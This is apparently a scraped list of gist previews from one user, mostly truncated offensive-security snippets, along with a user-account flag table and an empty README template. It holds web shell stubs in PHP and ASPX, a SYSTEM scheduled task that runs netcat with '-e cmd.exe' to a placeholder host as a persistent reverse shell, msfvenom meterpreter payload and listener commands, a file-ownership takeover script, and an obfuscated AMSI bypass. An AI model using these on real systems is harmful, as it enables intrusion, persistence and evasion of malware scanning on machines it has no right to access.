timsonner

Property Flag	Value in Hexadecimal	Value in Decimal	Brief Description
SCRIPT	0x0001	1	The logon script will be run.
ACCOUNTDISABLE	0x0002	2	The user account is disabled.
HOMEDIR_REQUIRED	0x0008	8	The home folder is required.
LOCKOUT	0x0010	16

timsonner

PHP, Javascript, HTML non-interactive web shell

php-linux-shell.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Non-Interactive Shell</title>
    <script>

timsonner

PowerShell HTTP fileserver

Kick hole in firewall

New-NetFirewallRule -DisplayName "Open Port 8081" -Direction Inbound -Protocol TCP -LocalPort 8081 -Action Allow

PowerShell Http Server

# Define the directory to serve

timsonner

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>PowerSnail Shell</title>
    <style>
        .output {
            font-family: Consolas, "Courier New", monospace;

timsonner

Modify file Access Controls with PowerShell

# Take ownership of the file
$filePath = (Read-Host "Filepath")
$acl = Get-Acl -Path $filePath
$acl.SetOwner([System.Security.Principal.NTAccount]$(Read-Host "Username"))
Set-Acl -Path $filePath -AclObject $acl
Get-Acl -Path $filePath

timsonner

Creating a scheduled task with PowerShell

# Create scheduled task
$taskAction = New-ScheduledTaskAction -Execute "c:\tools\nc64" -Argument "-e cmd.exe x.x.x.x 4444"
$startTime = (Get-Date).AddMinutes(1)
$taskTrigger = New-ScheduledTaskTrigger -Once -At $startTime -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::FromDays(1))
$taskPrincipal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
$taskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$task = New-ScheduledTask -Action $taskAction -Principal $taskPrincipal -Trigger $taskTrigger -Settings $taskSettings
Register-ScheduledTask -TaskName "Netcat-Scheduled-Task" -InputObject $task

timsonner

Abusing services

Payload recipes

# Create service payload using MSFvenom (windows/x64/meterpreter/reverse_tcp)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f exe-service -o evil-service.exe

# Metasploit listenter (windows/x64/meterpreter/reverse_tcp)
msfconsole -q -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST x.x.x.x;set LPORT 4444;run"

timsonner

Project Name

A brief description of your project, its purpose, and what it achieves.

Table of Contents

1. Overview
2. File Descriptions
3. Getting Started
4. Usage
5. Contributing

timsonner

using System;
using System.Runtime.InteropServices;

class DriverServiceInstaller
{
    const int SERVICE_KERNEL_DRIVER = 0x00000001;
    const int SERVICE_DEMAND_START = 0x00000003;
    const int SERVICE_ERROR_NORMAL = 0x00000001;

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]

timsonner

# [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Create a reference to the assembly with further obfuscation
$randomPart = 'A' + 'msi' + 'Utils'
$ref = [Ref]
$asm = $ref.Assembly
$amsiType = $asm.GetType('System.' + 'Management.' + 'Automation.' + $randomPart)

# Prepare the field name in a more obfuscated way
$amsiFieldName = 'amsi' + 'Init' + 'Failed'
$amsiField = $amsiType.GetField($amsiFieldName, 'NonPublic, Static')